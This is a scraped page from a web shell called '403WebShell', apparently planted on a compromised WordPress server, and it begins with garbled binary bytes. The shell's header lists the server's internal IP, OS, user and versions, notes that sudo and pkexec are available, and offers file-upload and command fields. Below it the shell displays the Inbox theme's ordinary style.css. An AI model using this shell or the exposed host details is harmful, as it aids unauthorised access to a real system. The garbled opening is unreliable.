h(  ) ($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms����Sb�,;R''6c2I�!\����kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K����x)1�6@r*2�89ma��&��'ti������{~#������t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1����w�r��l&-t*3�<<�u��#����j&.u��J68\8?"#$%&'()*+,-./0 ! 
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell
403Webshell
Server IP : 10.254.12.21  /  Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/skruarchives/wp-content/themes/inbox/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/skruarchives/wp-content/themes/inbox/style.css
/*
Theme Name: Inbox
Theme URI: http://metricthemes.com/theme/inbox
Author: MetricThemes
Author URI: http://metricthemes.com/
Description: Inbox is an unconventional WordPress Blogging Theme that is designed to make your website look like a Email App. With its 4 Column layout, Inbox WordPress theme makes it easier to lay out your posts, content, sidebar and social menu in easy to view design. Like a modern email app, Inbox WordPress Theme does not include a full page scrolling effect but rather each section has its own scrolling effect making it effective to showcase a lot of content without loosing the email app like effect. Inbox WordPress Theme is carefully optimized to work in all kinds of devices, be it desktop, mobile or tablet. Inbox is built using latest Twitter Bootstrap CSS Framework to magically layout each columns according to the device width. Inbox also comes with unlimited color customization option so you can customize each section of your site with whatever color you prefer. Theme demo: https://preview.metricthemes.com/inbox/
Version: 1.0.7
License: GNU General Public License v2 or later
License URI: http://www.gnu.org/licenses/gpl-2.0.html
Text Domain: inbox
Tags: two-columns, three-columns, four-columns, left-sidebar, custom-colors, custom-menu, custom-logo, featured-images,sticky-post, theme-options, threaded-comments, translation-ready, blog, news, photography

This theme, like WordPress, is licensed under the GPL.
Use it to make something cool, have fun, and share what you've learned with others.
Inbox is based on Underscores http://underscores.me/, (C) 2012-2015 Automattic, Inc.
Underscores is distributed under the terms of the GNU GPL v2 or later.
*/

/*--------------------------------------------------------------
# General
--------------------------------------------------------------*/
body {
 font-family: 'Karla', sans-serif;
 background-color:#ffffff;
}
a,
visited {
color:#F13446;
}
a:hover {
color:#F13446;
}
/* Text meant only for screen readers. */
.screen-reader-text {
  border: 0;
  clip: rect(1px, 1px, 1px, 1px);
  clip-path: inset(50%);
  height: 1px;
  margin: -1px;
  overflow: hidden;
  padding: 0;
  position: absolute;
  width: 1px;
  word-wrap: normal !important;
}
.screen-reader-text:focus {
  background-color: #eee;
  clip: auto !important;
  clip-path: none;
  color: #444;
  display: block;
  font-size: 1em;
  height: auto;
  left: 5px;
  line-height: normal;
  padding: 15px 23px 14px;
  text-decoration: none;
  top: 5px;
  width: auto;
  z-index: 100000; /* Above WP toolbar. */
}
.loading-text {
 font-family: 'Karla', sans-serif;
 text-transform:uppercase;
 font-size:24px;
 font-weight:bold;
 color:#F13446;
}
/*--------------------------------------------------------------
# Header and Navigation
--------------------------------------------------------------*/
.navbar-toggler {
display:none;
}
.site-header {
background-color:#061932;
max-height:75px;
}
.site-header .site-branding {
text-align:center;
}
.site-header .site-branding .custom-logo {
max-width:200px;
height:auto;
margin-top:13px;
}
.site-header .site-branding h1.site-title {
text-align:center;
margin-bottom:0px !important;
margin-top:0px;
line-height: 0.6em;
}
.site-header .site-branding a,visited {
color:#fff;
font-size:20px;
}
.site-header .site-branding a:hover {
text-decoration:none;
}
.site-header .site-branding p {
color:#fff;
font-size:13px;
margin-top:0px;
margin-bottom:0px;
}
.site-navigation{
    float: left;
    position: relative;
    z-index: 11;
}
.site-navigation ul{
    margin: 0;
    padding: 0;
    list-style: none;
    font-size: 15px;    
    font-weight: 400;
    line-height: 18px;
}
.site-navigation ul li{
    list-style: none;
    float: left;
    margin-left: 0px;
    position: relative;
    margin-bottom: 0;
}
.site-navigation ul li:first-child{margin-left: 0;}
.site-navigation ul li a{
    color: #ffffff;
	padding:15px 25px;
	font-weight:400 !important;
}
.site-navigation ul li a:hover,
.site-navigation ul li a:focus,
.site-navigation ul li a:active,
.site-navigation ul .current-menu-item a,
.site-navigation ul li:hover > a{
    text-decoration: none;
    color: #F13446;
}
.site-navigation ul li a:hover,
.site-navigation ul li:hover > a{
    display: block;
}
/*drop-down style*/
.site-navigation ul ul{
    position: absolute;
	background-color:#061932;
    top: 100%;
    left: 0;
    width: 220px;
    font-size: 14px;
	padding:5px 10px;
    line-height: 22px;
    text-transform: none;
    display: none;
	border:none;
	box-shadow: 0 1px 15px rgba(0,0,0,.08);	
}
.site-navigation ul li:hover ul{display: block;}
.site-navigation ul li:hover ul ul{display: none;}
.site-navigation ul ul li:hover > ul{display: block;}
.site-navigation ul ul li{
    float: none;
    display: block;
    margin: 0;
    border-bottom: 0px solid #3b445d;
}
.site-navigation ul ul li:last-child{border-bottom: 0;}
.site-navigation ul ul li a{
    color: #ffffff;
    font-size: 14px;
    display: block;
    padding: 10px;
}
.site-navigation ul ul li a:hover,
.site-navigation ul ul li:hover > a{
    text-decoration: none;
    background: unset;
    color: #F13446;
    padding: 10px;
}
.site-navigation ul ul ul{
    top: 0;
    left: 100%;
}

/*--------------------------------------------------------------
# Search Bar
--------------------------------------------------------------*/
.search-bar {
padding:10px 25px 0px 25px;
}
.search-bar  .search-form {
padding:0px;
overflow:hidden;
}
.search-bar  .search-form ::-webkit-input-placeholder { /* Chrome/Opera/Safari */
  color: #fff;
}
.search-bar  .search-form ::-moz-placeholder { /* Firefox 19+ */
  color: #fff;
}
.search-bar  .search-form  :-ms-input-placeholder { /* IE 10+ */
  color: #fff;
}
.search-bar  .search-form :-moz-placeholder { /* Firefox 18- */
  color: #fff;
}
.search-bar  .search-form label {
display:block;
width:80%;
float:left;
}
.search-bar  .search-form input.search-field {
background-color:#294264;
width:100%;
color:#fff;
font-family: 'Karla', sans-serif;
border:none;
padding:10px 15px;
}
.search-bar  .search-form input.search-submit {
font-family: 'Karla', sans-serif;
background-color: #F13446;
color: #fff;
float: left;
width: 20%;
border: none;
padding: 10px 15px;
text-transform: uppercase;
font-weight: 700;
}
/*--------------------------------------------------------------
# Widgeted Sidebar
--------------------------------------------------------------*/
.sidebar {
background-color:#0E2440;
height: calc(100vh - 75px); /* 100% of viewport height minus space for header+extra */
}
.post-list {
background-color:#F7F7F9;
height: calc(100vh - 75px); /* 100% of viewport height minus space for header+extra */
padding:0px 0px;
}
.post-list .single-post-list {
background-color:#F7F7F9;
padding:25px 30px;
border-bottom:1px solid #E4E4E9;
border-right:1px solid #E4E4E9;
}
.post-list .single-post-list {
position:relative;
}
.post-list .single-post-list .ribbon {
position:absolute;
bottom:0em;
right:0;
background-color:#dadadb;
color:#7e7e81;
font-size:13px;
padding:4px 10px;
border-radius:2px 0px 0px 0px;
}
.post-list .single-post-list:hover {
background-color:#fff;
border-right:1px solid #ffffff;
}
.post-list .single-post-list .post-thumbnail {
margin-top:6px;
padding:0px;
}
.post-list .single-post-list .no-thumbnail {
margin-top:6px;
padding:0px;
}
.post-list .single-post-list .text-holder .author-name {
color: #333333;
font-size:14px;
text-transform: uppercase;
}
.post-list .single-post-list .text-holder .post-date {
color:#777C9A;
font-size:14px;
text-transform: uppercase;
display:inline-block;
float:right;
margin-top:2px;
}
.post-list .single-post-list .text-holder .entry-title {
display:block;
color:#000;
font-size:18px;
font-weight:600;
margin-top:5px;
}
.post-list .single-post-list .text-holder .entry-title:hover {
text-decoration:none;
}
.post-list .single-post-list .text-holder .post-category {
margin-bottom:0px;
}
.post-list .single-post-list .text-holder .post-category a,visited {
font-size:12px;
text-transform:uppercase;
color:#F13446;
font-weight:bold;
margin-top:3px;
}
.post-list .single-post-list .text-holder .post-category a:hover {
text-decoration:none;
}
.post-list .single-post-list .text-holder .entry-excerpt {
margin:5px 0px;
}
.post-list .single-post-list .text-holder .entry-excerpt p {
font-size:14px;
line-height:1.6em;
color:#737897;
margin-top:0px;
}
.post-list .archive-title {
padding:15px 25px 10px 25px;
background-color:#0e2440;
}
.post-list .archive-title h2 {
font-size:15px;
color:#fff;
font-weight:600;
}
.post-list .archive-title p {
font-size:13px;
color:#fff;
}
.post-list .search-heading {
padding:15px 25px 10px 25px;
background-color:#0e2440;
}
.post-list .search-heading h1 {
font-size:15px;
color:#fff;
font-weight:600;
}
.widget-area {
}
.widget-area .widget {
color:#ABAEC0;
margin-bottom:25px;
}
.widget-area .widget .widget-title {
color:#fff;
margin-bottom:5px;
font-size:20px;
background-color:#1b3250;
padding:15px 15px 15px 25px;
margin-bottom:15px;
}
.widget-area .widget ul {
margin:0px;
padding:0px;
}
.widget-area .widget ul li {
margin-bottom:10px;
padding:0px 25px 0px 25px;
list-style:none;
}
.widget-area .widget a,visited {
color:#ABAEC0;
font-size:15px;
}
.widget-area .widget a:hover {
color:#fff;
text-decoration:none;
}
.widget-area .widget.widget_tag_cloud .tagcloud {
padding:0px 25px 25px 25px;
}
.widget-area .widget img {
max-width:100%;
height:auto;
}
.widget-area .widget .textwidget {
color:#ABAEC0;
margin-bottom:10px;
padding:0px 25px 0px 25px;
}
.widget-area .widget select,
.widget-area .widget.widget_categories select,
.widget-area .widget.widget_archive select {
	width:90%;
    margin-bottom: 17px;
    padding: 10px;
    margin: 5px 20px 20px 20px;
    background-color: #294264;
    color: #fff;
    border: none;
}
.widget-area .widget form {
margin-bottom:10px;
padding:0px 25px 0px 25px;
}
.widget-area .widget select {
width:100%;
}

.widget-area .widget_search .search-form {
padding:0px;
overflow:hidden;
width:90%;
margin:25px auto 25px auto;
}
.widget-area .widget_search .search-form ::-webkit-input-placeholder { /* Chrome/Opera/Safari */
  color: #fff;
}
.widget-area .widget_search .search-form ::-moz-placeholder { /* Firefox 19+ */
  color: #fff;
}
.widget-area .widget_search .search-form  :-ms-input-placeholder { /* IE 10+ */
  color: #fff;
}
.widget-area .widget_search .search-form :-moz-placeholder { /* Firefox 18- */
  color: #fff;
}
.widget-area .widget_search .search-form label {
display: block;
width: 68%;
float: left;
}
.widget-area .widget_search .search-form input.search-field {
background-color:#294264;
color:#fff;
width:100%;
float:left;
font-family: 'Karla', sans-serif;
border:none;
padding:10px 15px;
}
.widget-area .widget_search .search-form input.search-submit {
font-family: 'Karla', sans-serif;
background-color: #3356FF;
color: #fff;
float: left;
width: 32%;
border: none;
padding: 10px 15px;
text-transform: uppercase;
font-weight: 700;
}
.widget.widget_calendar table {
    position: relative;
    width: 100%;
}

.widget.widget_calendar table td {
    color: #ABAEC0;
    font-size: 13px;
    line-height: 24px;
    text-align: center;
    padding: 10px 9px;
    letter-spacing: 0.5px;
    border: solid 1px rgba(1, 58, 170, 0.2);
}

.widget.widget_calendar table td#today {
    background-color: #3356FF;
	color:#ffffff;
}

.widget.widget_calendar table td a {
    border: 1px solid #3356FF;
	color:#fff;
    font-size: 13px;
    display: inline-block;
    padding: 1px 0;
    border-radius: 50%;
    height: 32px;
    width: 32px;
}

.widget.widget_calendar table caption {
    font-size: 13px;
    line-height: 18px;
    color: #fff;
    text-transform: uppercase;
    font-weight: 700;
    margin-bottom: 0;
    text-align: center;
    background-color: #3356FF;
    letter-spacing: 0.5px;
    padding: 15px 0;
    caption-side: top;
}

.widget.widget_calendar table .fa {
    font-size: 16px;
    line-height: 20px;
    color: #fff;
}

.widget.widget_calendar table #prev {
    text-align: left;
    padding: 20px 0 0;
}

.widget.widget_calendar table #next {
    text-align: right;
    padding: 20px 0 0;
}

.widget.widget_calendar table #prev a {
    display: block;
    background: none;
    color: #fff;
    font-size: 13px;
    line-height: 17px;
    position: absolute;
    top: 15px;
    left: 11px;
    border: 0;
    text-transform: uppercase;
    font-weight: 700;
    width: 50px;
    letter-spacing: 0.5px;
}

.widget.widget_calendar table #next a {
    height: 100%;
    background: none;
    color: #fff;
    font-size: 14px;
    line-height: 17px;
    font-weight: 700;
    position: absolute;
    top: 21px;
    right: 10px;
    border: 0;
    text-transform: uppercase;
    font-weight: 700;
    width: 50px;
}

.widget.widget_calendar table #next .fa {
    margin-left: 5px;
}

.widget.widget_calendar table #prev .fa {
    margin-right: 5px;
}

.widget.widget_calendar table thead {
    color: #fff;
    font-size: 12px;
    line-height: 24px;
    font-weight: 700;
    color: #252628;
}

.widget.widget_calendar table tbody {
    border: 1px solid #ebebeb;
    border-top: 0;
}

.widget.widget_calendar table tbody td {
    border: solid 1px rgba(1, 58, 170, 0.2);
}

.widget.widget_calendar table th {
    padding: 10px 14px;
    font-size: 13px;
    line-height: 17px;
    font-weight: 700;
    color: #fff;
    background-color: rgba(1, 58, 170, 0.9);
}

.widget.widget_calendar table tfoot {
    display: none;
}

/*--------------------------------------------------------------
# Social Menu
--------------------------------------------------------------*/
.social-networks {
background-color:#061932;
height: calc(100vh - 75px); /* 100% of viewport height minus space for header+extra */
padding:0px;
}
.social-menu {
margin:0px;
margin-top:5em;
padding:0px;
}
.social-menu li {
margin:0px;
padding:0px;
list-style:none;
}
.social-menu li a {
color:#ffffff;
font-size:12px;
text-transform: uppercase;
text-align:center;
display:block;
padding:20px 20px;
}
.social-menu li a:hover {
background-color:#F13446;
text-decoration:none;
}
.social-menu li a::before {
font-family: "Socicon";
display:block;
font-size:30px;
}
/*--------------------------------------------------------------
# Entry Content
--------------------------------------------------------------*/
.post-content {
background-color:#ffffff;
height: calc(100vh - 75px); /* 100% of viewport height minus space for header+extra */
padding:0px 65px 0px 65px;
}
.single-post .post-content {
padding:0px 65px 0px 65px;
}
.post-content .entry-header {
}
.post-content .entry-header .post-meta {
margin-bottom:25px;
}
.post-content .entry-header .post-meta span {
color:#777C9A;
font-size:16px;
text-transform: capitalize;
font-weight:500;
display:inline-block;
}
.post-content .entry-header .post-meta span:after {
    content: "\2022";
    font-size: 20px;
	padding:15px 5px;
	vertical-align:middle;
}
.post-content .entry-header .post-meta span:last-child:after {
content:"";
}
.post-content .entry-header .post-meta span a,visited {
color:#777C9A;
}
.post-content .entry-title {
margin-top:25px;
font-size:30px;
color:#191919;
font-weight:700;
}
.post-content .post-thumbnail {
margin-bottom:25px;
}
.single-post .post-content .post-thumbnail img {
width:100%;
object-fit:cover;
}
.search .post-content .post-thumbnail,
.archive .post-content .post-thumbnail,
.home .post-content .post-thumbnail {
display:none;
}
.home .post-content {
}
.post-content .entry-content {
height:550px;
overflow:hidden;
position:relative;
}
.page .post-content .entry-content,
.single-post .post-content .entry-content {
height:unset;
overflow: visible;
}
.post-content .entry-content .read-more {
  position: absolute; 
  bottom: 0; 
  left: 0;
  width: 100%; 
  text-align: center; 
  margin: 0; padding: 30px 0;
  background-image: linear-gradient(to bottom, transparent, white);
  z-index:1000;
}
.post-content .entry-content .read-more .button {
  background-color:#F13446;
  color:#fff;
  padding:15px 45px;
  border-radius:25px;
  font-size:20px;
  font-family: 'Karla', sans-serif;
}
.post-content .entry-content .read-more .button:hover {
text-decoration:none;
}
.single-post .post-content .entry-content .read-more,
.page .post-content .entry-content .read-more {
display:none;
}
.home .post-content .entry-content .read-more .button:hover {
text-decoration:nonel
}
.entry-content h1{
	line-height: 1.6em;
	font-size: 30px;
	font-weight: 600;
	color: #333333;
}
.entry-content h2{
	font-weight: 500;
	color: #333333;
	font-size: 26px;
	line-height: 1.6em;
}

.entry-content h3{
	line-height: 1.6em;
	font-size: 24px;
	font-weight: 500;
	color: #333333;
}
.entry-content h4{
	line-height: 1.6em;
	font-size: 22px;
	font-weight: 400;
	color: #333333;
}
.entry-content h5{
	line-height: 1.6em;
	font-size: 20px;
	font-weight: 400;
	color: #333333;
}
.entry-content h6{
	line-height: 1.6em;
	font-size: 16px;
	font-weight: 400;
	color: #333333;
}
.entry-content p{
	font-size: 18px;
	font-weight: 400;
	color: #3A3A3A;	
	line-height: 28px;
	margin: 0 0 15px 0;
}
.entry-content p a,visited {
color:#F13446;
}
.entry-content figure.wp-block-image img {
width:100%;
height:auto;
}
.entry-content .pull-right{
	float: right;
	color: #3A3A3A;
	width: 32%;
	border-top: 3px solid #0363CD;
	padding: 10px 20px 0 0;
	font-style: italic;
	font-weight: 600;
	line-height: 26px;
	font-size: 16px;
	margin: 1.5% 5% 2% 0;
}
.entry-content .pull-left{
	float: left;
	color: #3A3A3A;
	width: 32%;
	border-top: 3px solid #0363CD;
	padding: 10px 20px 0 0;
	font-style: italic;
	font-weight: 600;
	line-height: 26px;
	font-size: 16px;
	margin: 1.5% 5% 2% 0;
}
.entry-content figure.wp-caption{
	position: relative;
	margin: 35px 0 50px 0;

}
.entry-content .wp-caption-text{
	position: absolute;
	bottom: 0;
	background-color: rgba(0, 0, 0, 0.3);
	width: 100%;
	font-size: 12px;
	color: #ffffff;
	font-weight: 400;
	padding: 5px 15px;
}
.entry-content blockquote{
	border-left: 3px solid #0363CD;
	position: relative;
	padding: 0;
	padding-left: 20px;
	margin: 35px 0 50px 0;
}
.entry-content blockquote p{
	color: #3A3A3A;
	font-size: 16px;
	font-weight: 500;
	font-style: italic;
	width: 60%;
	padding-left: 5px;
	padding-bottom: 10px;
}
.entry-content blockquote p:before{
	content: ' " ';
	position: absolute;
	font-weight: 600;
	color: #343434;
	font-size: 24px;
	top: -10px;
	left: 1%;
}
.entry-content pre{
    background: #eee;
    font-family: "Courier 10 Pitch", Courier, monospace !important;
    font-size: 13px;
    font-size: 0.9375rem;
    line-height: 1.6;
    margin-bottom: 1.6em;
    max-width: 100%;
    overflow: auto;
    padding: 1.6em;
}
.entry-content code{
    background: #ffffff;
    font-family: "Courier 10 Pitch", Courier, monospace !important;
    font-size: 13px;
    font-size: 1.5rem;
    line-height: 1.6;
	margin-top:20px;
    margin-bottom: 1.6em;
    max-width: 100%;
    overflow: auto;
	word-wrap: break-word;
}
.entry-content table {
	margin: 0 0 1.5em;
	width: 100%;
	border-radius: 0;
	font-size: 1em;
	text-align: left;
}
.entry-content table tr th {
	font-weight: 500;
	color: #212127;
	padding: 15px 15px;
	text-transform:uppercase;
	border-bottom: 2px solid #EBEBEB;
}
.entry-content table tr td {
	color: #353535;
	padding: 15px 15px;
}
.entry-content table tbody tr:nth-child(odd) {
	background: rgba(0,0,0,0.035);
}
.entry-content ul{
	margin: 15px 0;
	padding-left: 15px;
	list-style-type: square;
}
.entry-content ul li{
	font-size: 16px;
	font-weight: 400;
	color: #343434;
	line-height: 26px;
}

.entry-content ol{
	margin: 15px 0;
	padding-left: 15px;
	list-style-type: decimal;
}
.entry-content ol li{
	font-size: 16px;
	font-weight: 400;
	color: #343434;
	line-height: 26px;
}
.entry-content .highlight{
	background-color: #fff198;
}
.entry-content form{
	margin: 15px 0;
}
.entry-content form label{
	font-weight: 500;
	color: #6D737B;
	font-size: 18px;
	line-height: 26px;
	padding-top: 15px;
	display: block;
}
.entry-content form input{
	display: block;
	width: 100%;
	border-radius: 4px;
	-webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075);
    box-shadow: inset 0 1px 1px rgba(0,0,0,.075);
    -webkit-transition: border-color ease-in-out .15s,-webkit-box-shadow ease-in-out .15s;
    -o-transition: border-color ease-in-out .15s,box-shadow ease-in-out .15s;
    transition: border-color ease-in-out .15s,box-shadow ease-in-out .15s;
    border: 1px solid #ccc;
    padding: 13px;
}
.entry-content form textarea{
	display: block;
	width: 100%;
	border-radius: 4px;
	-webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075);
    box-shadow: inset 0 1px 1px rgba(0,0,0,.075);
    -webkit-transition: border-color ease-in-out .15s,-webkit-box-shadow ease-in-out .15s;
    -o-transition: border-color ease-in-out .15s,box-shadow ease-in-out .15s;
    transition: border-color ease-in-out .15s,box-shadow ease-in-out .15s;
    border: 1px solid #ccc;
}
.entry-content form select{
	display: block;
	    width: 100%;
    height: 45px;
    padding: 6px 12px;
    font-size: 14px;
    line-height: 1.42857143;
    color: #555;
    background-color: #fff;
    background-image: none;
    border: 1px solid #ccc;
    border-radius: 4px;
    -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075);
    box-shadow: inset 0 1px 1px rgba(0,0,0,.075);

}
.entry-content form div input[type=radio]:checked + label,
.entry-content form div input[type=radio]:not(:checked) + label{
	color: #6D737B;
	display: inline-block;
	margin-right: 45px;
	font-weight: 400;
	font-size: 14px;
	padding-top: 0;
	margin-left: 10px;
}
.entry-content form div label input[type=radio]{
	margin: 0;
	margin-right: 10px;
}

.entry-content form input[type=radio]{
	-webkit-box-shadow: none;
    box-shadow: none;
    -webkit-transition: none;
    -o-transition: none;
    transition: none;
    display: inline-block;
    width: auto;
}

.entry-content form input[type=checkbox]{
	-webkit-box-shadow: none;
    box-shadow: none;
    -webkit-transition: none;
    -o-transition: none;
    transition: none;
    width: auto;
    display: inline-block;
    margin-right: 10px;
}
.entry-content form div label{
	color: #6D737B;
	margin-right: 45px;
	font-weight: 400;
	font-size: 14px;
	padding-top: 0;
}
.entry-content form input[type=file]{
-webkit-box-shadow: none;
    box-shadow: none;
    -webkit-transition: none;
    -o-transition: none;
    transition: none;
    width: auto;
    border: none;
    padding: 0;
    margin: 15px 0;
   font-weight: 400;
   color: #6D737B;
}
.entry-content form input[type=file]::-webkit-file-upload-button{
	background-color: #DADADA;
	padding: 10px 30px;
	font-size: 14px;
	font-weight: 500;
	color: #6D737B;
	border-color: transparent;
}
.entry-content form button{
	background-color: #00459C;
	color: #ffffff;
	padding: 10px 30px;
	font-weight: 500;
	font-size: 14px;
	border-color: transparent;
}

.entry-content .gallery .gallery-item{
	width: 31.8%;
	display: inline-block;
	margin: 5px;

}
.entry-content .gallery .gallery-item .gallery-caption{
	position: static;
	background-color: transparent;
	color: #3A3A3A;
	padding: 10px 0;
	font-weight: 600;
	font-size: 14px;
	text-align: center;
}

.page .entry-content form,
.single .entry-content form {
    margin: 0px 0;
}

.entry-content form label {
    font-weight: 500;
    color: #343434;
    font-size: 18px;
    line-height: 26px;
    padding-top: 15px;
    display: block;
}

.entry-content form input {
    display: block;
    width: 100%;
    border-radius: 1px;
    background-color: rgba(239, 240, 240, 0.8);
    -webkit-transition: border-color ease-in-out .15s, -webkit-box-shadow ease-in-out .15s;
    -o-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
    transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
    border: 1px solid #f4f4f4;
    padding: 13px;
}

.entry-content form textarea {
    display: block;
    width: 100%;
    border-radius: 1px;
    background-color: rgba(239, 240, 240, 0.8);
    -webkit-transition: border-color ease-in-out .15s, -webkit-box-shadow ease-in-out .15s;
    -o-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
    transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
	border:none;
    padding: 13px;
    resize: none;
}

.entry-content form select {
    display: block;
    width: 100%;
    border-radius: 1px;
    background-color: rgba(239, 240, 240, 0.8);
    -webkit-transition: border-color ease-in-out .15s, -webkit-box-shadow ease-in-out .15s;
    -o-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
    transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
	border:none;
    padding: 13px;

}
.select2-container--default .select2-selection--single {
    display: block;
    width: 100%;
    border-radius: 1px;
    background-color: rgba(239, 240, 240, 0.8);
    -webkit-transition: border-color ease-in-out .15s, -webkit-box-shadow ease-in-out .15s;
    -o-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
    transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
	border:none;
    padding: 13px;
    padding: 13px 0px;
	height:46px;
}
.select2-container--default .select2-selection--single .select2-selection__rendered {
    color: #444;
    line-height: 19px;
}
.select2-container--default .select2-selection--single .select2-selection__arrow b {
    top: 83%;
}

.entry-content form div input[type=radio]:checked+label,
.entry-content form div input[type=radio]:not(:checked)+label {
    color: #343434;
    display: inline-block;
    margin-right: 45px;
    font-weight: 400;
    font-size: 14px;
    padding-top: 0;
    margin-left: 10px;
}

.entry-content form div label input[type=radio] {
    margin: 0;
    margin-right: 10px;
}

.entry-content form input[type=radio] {
    -webkit-box-shadow: none;
    box-shadow: none;
    -webkit-transition: none;
    -o-transition: none;
    transition: none;
    display: inline-block;
    width: auto;
}
.entry-content form input[type=checkbox] {
    -webkit-box-shadow: none;
    box-shadow: none;
    -webkit-transition: none;
    -o-transition: none;
    transition: none;
    width: auto;
    display: inline-block;
    margin-right: 10px;
}

.entry-content form div label {
    color: #343434;
    margin-right: 45px;
    font-weight: 400;
    font-size: 14px;
    padding-top: 0;
}

.entry-content form input[type=file] {
    -webkit-box-shadow: none;
    box-shadow: none;
    -webkit-transition: none;
    -o-transition: none;
    transition: none;
    width: auto;
    border: none;
    padding: 0;
    margin: 15px 0;
    font-weight: 400;
    color: #343434;
}

.entry-content form input[type=file]::-webkit-file-upload-button {
    background-color: #DADADA;
    padding: 10px 30px;
    font-size: 14px;
    font-weight: 500;
    color: #343434;
    border-color: transparent;
}

.entry-content form button {
    border-radius: 0;
    color: #ffffff;
    font-size: 14px;
    text-transform: capitalize;
    font-weight: 700;
    padding: 12px 29px;
    margin-top: 10px;
    border: 0;
}

.entry-content .gallery .gallery-item {
    width: 31.8%;
    display: inline-block;
    margin: 5px;
}

.entry-content .gallery .gallery-item .gallery-caption {
    position: static;
    background-color: transparent;
    color: #3A3A3A;
    padding: 10px 0;
    font-weight: 600;
    font-size: 14px;
    text-align: center;
}

.entry-content .post-tags {
margin:0px;
padding:0px;
font-size:14px;
}
.entry-content .post-tags a {
padding:0px;
font-size:14px;
}

/*--------------------------------------------------------------
# Alignments
--------------------------------------------------------------*/
.alignleft {
    display: inline;
    float: left;
    margin-right: 1.5em;
}

.alignright {
    display: inline;
    float: right;
    margin-left: 1.5em;
}

.aligncenter {
    clear: both;
    display: block;
    margin-left: auto;
    margin-right: auto;
}


/*--------------------------------------------------------------
# Comment Form
--------------------------------------------------------------*/
.comments-area{
	margin-top: 60px;
}
.comments-area .comments-title{
	font-size: 24px;
	font-weight: 400;
	color: #424242;
}
.comments-area .comment-list{
	padding-left: 0;
	list-style-type: none;
}
.comments-area .comment-author img{
	float: left;
	margin-right: 15px;
}
.comment-author .fn, .comment-author .says{
	color: #191919;
	font-weight: 500 !important;
	font-size: 16px;
}
.comments-area .comment-metadata {
	color: #6D737B;
	font-weight: 400;
	font-size: 13px;
	padding: 5px 0;
	margin-top:5px;
}
.comments-area .comment-metadata a{
	color: #6D737B;
}
.comments-area .comment-content p{
	color: #3A3A3A;
	font-size: 14px;
	line-height: 24px;
	font-weight: 400;
	margin-bottom:15px;
}
.comment-list .comment-content, .comment-list .reply{
	margin-left: 103px;
	margin-top:15px;
}
.comment-list .reply{
	font-weight: 600;
	font-size: 14px;
	text-transform: capitalize;
}
.comment-list .reply a{
	color: #0363cd;
	float:right;
	font-weight:500;
	font-size:13px;
}
.comment-list .comment-body{
	background-color:#f7f7f7;
	padding:25px;
	margin-bottom:25px;
	overflow:hidden;
}
.comment-list li.bypostauthor .comment-body{
	border:1px solid #ccc;
}
.comment-list .children{
	list-style-type: none;
	padding-left: 103px;
}

#respond {
	margin-bottom: 30px
}

#respond label {
	color: #222;
	font-size: 16px
}

#respond p.comment-form-cookies-consent label {
	margin-left: 12px;
	font-size: 14px
}

body #respond #cancel-comment-reply-link {
	color: #777;
	font-size: 13px;
	transition: all, ease, .2s
}

body #respond #cancel-comment-reply-link:hover {
	color: #999
}

body #respond #cancel-comment-reply-link:before {
}
#respond label {
font-weight:400;
font-size:15px;
}

#respond .comment-form-author input,
#respond .comment-form-email input,
#respond .comment-form-url input,
#respond textarea {
	width: 100%;
	margin-top: 6px;
	display: block;
    border-radius: 1px;
	background-color:#ffffff;
    border: 1px solid #e2e2e2;
	box-shadow:none;
    padding: 25px 13px;	
}

#respond .form-submit,
#respond form {
	margin-bottom: 0;
	clear: both
}
#respond form p {
margin-bottom:25px;
}
#respond form p a {
	color: #777
}
#respond .form-submit #submit {
    padding: .8em 2em;
    border-radius: 3px;
    color: #fff;
    background: #111;
    font-size: 15px;
    font-weight: 400;
    border: none;
    transition: all .2s;
}

#respond p.logged-in-as {
color: #6D737B;
font-size:13px;
}

.no-results {
text-align:center;
margin-top:5%;
color:#bfbebe;
}
.no-results .search-form {
max-width:50%;
margin:0px auto;
}
.search-form {
padding:0px;
overflow:hidden;
}
.search-form ::-webkit-input-placeholder { /* Chrome/Opera/Safari */
  color: #fff;
}
.search-form ::-moz-placeholder { /* Firefox 19+ */
  color: #fff;
}
.search-form  :-ms-input-placeholder { /* IE 10+ */
  color: #fff;
}
.search-form :-moz-placeholder { /* Firefox 18- */
  color: #fff;
}
.search-form label {
display:block;
width:80%;
float:left;
}
.search-form input.search-field {
background-color:#294264;
width:100%;
color:#fff;
font-family: 'Karla', sans-serif;
border:none;
padding:10px 15px;
}
.search-form input.search-submit {
font-family: 'Karla', sans-serif;
background-color: #F13446;
color: #fff;
float: left;
width: 20%;
border: none;
padding: 10px 15px;
text-transform: uppercase;
font-weight: 700;
}
/*--------------------------------------------------------------
# Pagination
--------------------------------------------------------------*/
.navigation.pagination{
	width: 100%;
	text-align: center;
}
.navigation.pagination .nav-links {
margin:20px auto;
}
.navigation.pagination .nav-links a{
	display: inline-block;
	background-color: #EDEDED;
	padding: 13px;
	color: #3A3A3A;
}
